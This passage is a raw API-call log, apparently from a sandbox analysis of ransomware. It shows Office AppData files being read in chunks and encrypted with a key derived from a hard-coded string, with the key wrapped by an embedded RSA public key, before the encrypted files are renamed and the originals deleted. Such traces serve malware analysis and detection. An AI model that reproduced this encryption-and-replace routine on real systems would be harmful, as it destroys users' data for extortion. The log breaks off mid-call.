[0269.170] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.170] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.170] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.171] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.171] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.171] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.171] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.171] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.171] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.171] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.172] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.172] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.173] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.173] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.174] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.174] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.174] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x322, lpOverlapped=0x0) returned 1 [0269.174] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x322, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x330) returned 1 [0269.174] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x330, lpOverlapped=0x0) returned 1 [0269.174] CloseHandle (hObject=0x5d48) returned 1 [0269.174] CloseHandle (hObject=0x5d3c) returned 1 [0269.175] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.179] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.180] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml.gsg")) returned 1 [0269.181] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\osfinstaller.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\osfinstaller.exe_rules.xml.fuck")) returned 1 [0269.183] CryptDestroyHash (hHash=0x2fa7c8) returned 1 [0269.183] CryptDestroyKey (hKey=0x2fa848) returned 1 [0269.183] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.183] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.183] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.183] GetLastError () returned 0x0 [0269.183] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml")) returned 0x20 [0269.184] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.184] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.185] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.186] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.187] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.189] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.189] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.189] CryptHashData (hHash=0x2fa888, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.189] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa888, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa408) returned 1 [0269.190] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.190] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.190] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f25ce0) returned 1 [0269.190] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25ce0, dwCertEncodingType=0x1, pInfo=0x2f30b00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f30b30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f30b38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa848) returned 1 [0269.190] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.190] CryptEncrypt (in: hKey=0x2fa848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26450*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26450*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.190] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26450*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26450*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.191] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.200] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.200] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.213] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.214] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.214] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.214] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.215] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.215] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.215] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.215] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 